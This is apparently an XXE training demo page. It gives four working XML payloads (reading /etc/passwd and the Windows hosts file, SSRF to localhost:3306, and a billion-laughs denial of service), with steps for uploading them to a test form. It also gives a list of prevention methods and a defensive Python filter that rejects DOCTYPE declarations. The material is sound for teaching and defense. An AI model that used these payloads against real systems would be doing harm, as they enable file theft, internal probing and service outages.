XXE (XML External Entity) Demo
XML External Entity (XXE) injection is a vulnerability that occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
What XXE Can Do:
- File Disclosure: Read local files from the server
- SSRF Attacks: Make requests to internal systems
- DoS Attacks: Consume server resources
- RCE: Remote code execution in some cases
Try These XXE Payloads:
Create XML files with these contents and upload them:
1. Basic File Disclosure (Windows):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<root>
<data>&xxe;</data>
</root>
2. Basic File Disclosure (Linux):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
3. SSRF via XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://localhost:3306/">
]>
<root>
<data>&xxe;</data>
</root>
4. Billion Laughs DoS Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
XXE Prevention Methods:
- Disable External Entities: Configure XML parser to disable external entity processing
- Input Validation: Validate and sanitize XML input
- Use Safe Parsers: Use XML parsers that are secure by default
- Whitelisting: Only allow specific XML structures
- Patch Libraries: Keep XML processing libraries updated
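As an added example, not code from the demo page or its application, the following stdlib-only Python intake filter applies the first and fourth prevention methods above: it refuses any upload that declares a DOCTYPE (the only place internal, external and parameter entities can be declared), caps the document size, and only then hands the bytes to the parser. The function names, the MAX_XML_BYTES cap and the SAMPLES inputs are assumptions constructed for this example; the sample payload shapes mirror the page's four payload classes so the check can be seen refusing each of them while accepting a benign document.

```python
"""Defensive XML intake: refuse any document that declares a DTD before parsing."""
import re
import xml.etree.ElementTree as ET

# Hypothetical upload size cap for this example (not a value from the demo page).
MAX_XML_BYTES = 1_000_000

# The DOCTYPE keyword is case-sensitive in XML, so an exact byte match is enough.
# Entity declarations (internal, external and parameter entities) can only live
# inside a DOCTYPE, so refusing the DOCTYPE refuses file disclosure, SSRF and
# billion-laughs payloads alike.
DOCTYPE_MARKER = re.compile(rb"<!DOCTYPE")


class UnsafeXMLError(ValueError):
    """Raised when an upload is refused before or while it is parsed."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse uploaded XML bytes, refusing DTDs and oversized documents."""
    if len(data) > MAX_XML_BYTES:
        raise UnsafeXMLError("document exceeds size limit")
    if DOCTYPE_MARKER.search(data):
        # Fail closed: a DOCTYPE inside a comment or CDATA section is refused
        # too, which is an acceptable false positive for an upload form.
        raise UnsafeXMLError("DOCTYPE declarations are not accepted")
    try:
        return ET.fromstring(data)
    except ET.ParseError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc


def classify(data: bytes) -> str:
    """Return 'accepted' or 'rejected: <reason>', suitable for an audit log line."""
    try:
        parse_untrusted_xml(data)
        return "accepted"
    except UnsafeXMLError as exc:
        return f"rejected: {exc}"


# Constructed sample inputs: the shapes of the demo page's payloads plus one
# benign document. The entity bodies are kept short on purpose.
SAMPLES = {
    "file_disclosure": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<root><data>&xxe;</data></root>"
    ),
    "ssrf": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://localhost:3306/">]>'
        b"<root><data>&xxe;</data></root>"
    ),
    "billion_laughs": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]>'
        b"<lolz>&lol2;</lolz>"
    ),
    "benign": b'<?xml version="1.0"?><root><data>hello</data></root>',
}


def run_samples() -> dict:
    """Run every constructed sample through the filter and collect verdicts."""
    return {name: classify(doc) for name, doc in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:16s} {verdict}")
```

Refusing the DOCTYPE outright is the approach that needs no parser-specific knobs, which is why it suits an upload form; where the parser exposes them, disabling external general entities as well (for example `feature_external_ges` in Python's `xml.sax`) gives defense in depth for documents that legitimately need a DTD.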
Test Steps:
- Copy one of the payloads above into a text file
- Save it with a .xml extension
- Upload the file using the form below
- Observe the server response for sensitive information